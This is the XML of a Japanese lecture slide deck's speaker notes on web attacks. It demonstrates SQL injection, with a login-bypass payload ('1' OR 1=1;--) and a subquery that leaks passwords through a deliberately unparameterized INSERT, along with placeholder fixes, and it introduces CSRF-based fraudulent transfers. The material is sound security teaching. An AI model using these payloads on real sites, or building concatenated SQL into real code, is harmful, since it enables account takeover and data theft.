              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策のプログラムと異なり、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードが一致した物を取り出し、プレースホルダを使わず、そのまま文字列を繋げます。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47</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499837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こちらは掲示板のプログラムで、ここは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策の時と同じ内容です。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48</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463988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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>render_template</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で読み込むログイン画面の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>は、今回入力に脆弱性を出すため、どちらも入力必須にせず、メールアドレスもタイプをテキストにします。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49</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340718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ではまず</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害について。こちらはアメリカ合衆国メリーランド州にあります</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>というセキュリティ専門の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>NPO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>団体が発表するサイバー犯罪の被害ランキングになります。ここで注目したいのが第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>位で、インジェクションというのは「注入」と訳すことができ、主に今までの講座でやりました、サーバ側の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>プログラミングでプログラムの構造を利用した攻撃手法を指します。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5</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37001169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では実行して</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0"/>
              <a:t>1’ OR 1=1;--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と打ち込みます。するとこれだけでログインに成功します。注意点として、今回はログイン用に過去に作ったデータベースでログイン処理をするため、普通にメールアドレスとパスワードを打ち込んでもパスワードがハッシュ化されないためログインは出来ません。</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50</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957096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不正ログインが発生する原因としては、入力フォームから送信された文字列で、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文がプログラム作成者の意図しない動作をすることが原因となります。そこで、入力された内容そのものが文字列となって構文に影響がなくなるようにエスケープ処理をします。このためにプレースホルダを使用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51</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778378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先ほど使ったサーバ側のプログラムで、ログインに必要な</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文で、今までの講座通りプレースホルダを用いるように変更します。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52</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2709523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これで実行すると、今度は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の値が入力された値になり、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文が変わらなくなるため、不正ログインができなくなります。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53</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39352676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ただし、補足事項として、確かに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードで、同時に条件を満たすようにすれば、ログインは可能です。しかし、それではパスワードが平文になることが大前提で、万が一プレースホルダを使うことを忘れた場合に不正ログインを許してしまいます。そこで、実際に認証をするときは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SLEECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文でパスワードを取り出して、パスワードをハッシュ認証することをお勧めします。ただし、プレースホルダは最低限しなければいけないセキュリティ対策なので、忘れずにやりましょう。</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54</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="977373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それでは次に、想定される被害の一つとして、情報漏洩を実際にやってみます。内容としては、データベースの講座で作成した個人情報のテーブル、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に新しく個人情報を登録するサービスをインジェクションできるように作成します。ここで漏洩する対象のテーブルはログイン認証で使用する</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のパスワードになります。やり方としては</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の中に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を入れるサブクエリを使用します。例えば</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の一部に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を入れることで他のテーブルの情報を入れることができます。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55</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14282427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具体的に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文でサブクエリのやり方はこのようになります。ここでは名前に相当する</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にサブクエリを入れることで、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のパスワードが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>テーブルの名前のところに入ります。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56</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7361863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それでは実際にプログラムを作っていきます。まずはサーバ側で、ライブラリのインポートとデータベースの接続、リダイレクトｔと登録画面はこのようになっています。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57</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065511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次に情報の登録と表示です。ここで、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で受け取った時にプレースホルダを使用せずに登録します。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58</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34298563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登録をする画面の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードはこのようになっています。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59</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2818944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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスでおきる被害について、代表的な</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>例を紹介します。まずは、不正ログインです。これは何らかの手法で、他人の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワード、またはセッションを取得するか、データベースの脆弱性を利用した方法がログイン方法です。次に、不正なデータの閲覧です。これは本来権限のないデータベースのレコードや、ファイルなどにアクセスしてデータベースレコードや、ファイルなどの情報を閲覧する行為で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6</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29567303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では実際に情報漏洩をやります。さきほどのプログラムでは、名前のところにパスワードを表示させるため、シングルクォーテーションの位置から、役職・立場の欄にこちらの内容を打ち込みます。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60</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42395435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ボタンを押すと登録され、ハッシュ化されたパスワードが出力されます。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61</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3448669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パスワードがハッシュ化されていたいことや、字数制限で元のパスワードも全く分からない形で出力されていましたが、もし仮に、ハッシュ化せず平文の短いパスワードの場合は、ログインに必要な情報がこのように簡単に出力することができます。特に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のように最初の方だと管理者ユーザの可能性がありますので、この情報が盗まれると管理者権限でアクセスされ、他の情報も簡単に盗まれる危険性があります。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62</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2705062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それでは情報漏洩の対策ですが、これも不正ログインと同様に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文を変えない事が重要なので、プレースホルダを使用して構文に変化が起きないようにします。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63</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2327171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プログラムの改変場所は情報を登録する際の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で情報を受け取った時に使用する</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文です。ここにプレースホルダを使用します。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64</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36798519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すると、テキストボックスにさきほどと同じ内容を入れても、今度は打ち込んだ内容そのものが出てくるようになります。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65</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38414448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それでは次に、クロスサイトリクエストフォージェリという攻撃手法の説明をします。これは、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザに不正操作する攻撃手法の一つで、偽装した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を何らかの形で開かせることによって、利用者が意図しない特定のサイトで何らかの操作をさせることができます。名称が長いので以後は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と言います。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66</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2352814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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組みですが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でデータを送信する際に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>FORM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグを使用します。ここで送り先を指定する際に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使用しますが、このアクションの場所に特定のサイトの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を指定します。また、特別何か入力をしなくても、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの隠し要素である</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で値を隠してボタンを押すだけでデータを不正送信できます。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67</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14051446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攻撃の手順としては、まずユーザに対象のサイトにログインさせます。その後、何らかの形で用意した罠サイトにアクセスするようにします。そして罠サイトのボタンをクリックすると、ログインしたサイトではセッションを発行していますので、セッション情報を悪用され、攻撃者の意図したデータ送信が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68</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377876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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>をやられると具体的に起きうることを紹介します。よく言われている者としては、まずボタンを押すことでテキストデータ等が送信されて意図しない書き込みをされるなどがあります。次に、さらに問題なことが不正送金で、これはボタンを押すことで銀行名・振込先・金額データが送られて意図しない金額の振り込みをされること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69</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211529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次に、不正なデータの操作では、本来権限のないユーザが、データベースのレコードやファイルにアクセスして、情報を追加・更新・削除することや設定を変更するなどがあります。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>つ目の意図しないデータ送信では、ワンクリック詐欺や、フィッシング詐欺のように気づきにくい他のサイトを埋め込むことや、キャッチーなキーワードでボタンを押させることで、データ送信をするなどがあ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7</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3516093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では実際に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いた不正送金をやってみます。プログラムとしてライブラリのインポートとデータベース接続、ログイン画面へのリダイレクトをします。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70</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3377108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ログイン画面は第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回以前の手法のものを使用します。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71</a:t>
            </a:fld>
